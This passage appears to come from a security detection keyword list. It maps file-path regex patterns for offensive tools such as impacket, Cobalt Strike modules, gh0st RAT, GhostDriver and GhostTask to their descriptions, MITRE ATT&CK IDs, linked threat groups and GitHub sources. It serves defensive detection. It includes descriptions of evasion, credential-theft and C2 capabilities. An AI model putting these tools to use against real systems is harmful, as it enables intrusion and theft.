Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","15605" "*\getST.py*",".{0,1000}\\getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15606" "*\getST2.py*",".{0,1000}\\getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15607" "*\Get-TGSCipher.ps1*",".{0,1000}\\Get\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15611" "*\getTGT.py*",".{0,1000}\\getTGT\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15612" "*\Get-UnConstrained.ps1*",".{0,1000}\\Get\-UnConstrained\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15613" "*\GetUserSPNs.py*",".{0,1000}\\GetUserSPNs\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15614" "*\getvalueregistry.py*",".{0,1000}\\getvalueregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15615" "*\getvalueregistry.txt*",".{0,1000}\\getvalueregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15616" "*\GetWebDAVStatus\",".{0,1000}\\GetWebDAVStatus\\","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","15617" "*\GetWebDAVStatus_x64*",".{0,1000}\\GetWebDAVStatus_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","15618" "*\GetWhoamiCommand.cs",".{0,1000}\\GetWhoamiCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15619" "*\GetWinStationCommand.cs",".{0,1000}\\GetWinStationCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15620" "*\Get-WLAN-Keys.ps1*",".{0,1000}\\Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15621" "*\Get-WLAN-Keys.ps1*",".{0,1000}\\Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15622" "*\GetWmiObjectCommand.cs",".{0,1000}\\GetWmiObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15623" "*\gfscgsvs.log*",".{0,1000}\\gfscgsvs\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15624" "*\gh0st.exe*",".{0,1000}\\gh0st\.exe.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 
- TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","15625" "*\ghauri\ghauri\*",".{0,1000}\\ghauri\\ghauri\\.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","15626" "*\ghauri-1*\ghauri\*",".{0,1000}\\ghauri\-1.{0,1000}\\ghauri\\.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","15627" "*\GhostDriver.exe*",".{0,1000}\\GhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","15628" "*\ghostdriver.sys*",".{0,1000}\\ghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","15629" "*\GhostDriver-main\*",".{0,1000}\\GhostDriver\-main\\.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - 
TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","15630" "*\GhostMapper.sln*",".{0,1000}\\GhostMapper\.sln.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","0","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","15631" "*\GhostMouse.exe*",".{0,1000}\\GhostMouse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15632" "*\ghostsocks-master*",".{0,1000}\\ghostsocks\-master.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","15633" "*\GhostTask.h*",".{0,1000}\\GhostTask\.h.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). 
- Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","15634" "*\GhostTask\*",".{0,1000}\\GhostTask\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","15635" "*\GhostTask-1.0\*",".{0,1000}\\GhostTask\-1\.0\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","15636" "*\GhostTask-main*",".{0,1000}\\GhostTask\-main.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","15637" "*\glit.exe*",".{0,1000}\\glit\.exe.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","15638" "*\glit-cli*",".{0,1000}\\glit\-cli.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","15639" "*\GlllPowerLoader.py*",".{0,1000}\\GlllPowerLoader\.py.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 
- T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","15640" "*\GlllPowerLoader-master*",".{0,1000}\\GlllPowerLoader\-master.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","15641" "*\gmailC2.exe*",".{0,1000}\\gmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","15642" "*\gmer.exe*",".{0,1000}\\gmer\.exe.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","15643" "*\gmer64.pdb*",".{0,1000}\\gmer64\.pdb.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","15644" 
"*\gmer64.sys*",".{0,1000}\\gmer64\.sys.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","15645" "*\GMSAPasswordReader.*",".{0,1000}\\GMSAPasswordReader\..{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15646" "*\GMSAPasswordReader.*",".{0,1000}\\GMSAPasswordReader\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15647" "*\GMSAPasswordReader.exe*",".{0,1000}\\GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","15648" "*\GMSAPasswordReader.exe*",".{0,1000}\\GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15649" "*\GoAWSConsoleSpray-master*",".{0,1000}\\GoAWSConsoleSpray\-master.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","15650" "*\gocrack-1.0.zip*",".{0,1000}\\gocrack\-1\.0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/mandiant/gocrack","1","0","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","15651" "*\gocrack-master.*",".{0,1000}\\gocrack\-master\..{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","15652" "*\GodFault.*",".{0,1000}\\GodFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","15653" "*\godoh\cmd\*",".{0,1000}\\godoh\\cmd\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15654" "*\godoh\dnsclient\*",".{0,1000}\\godoh\\dnsclient\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
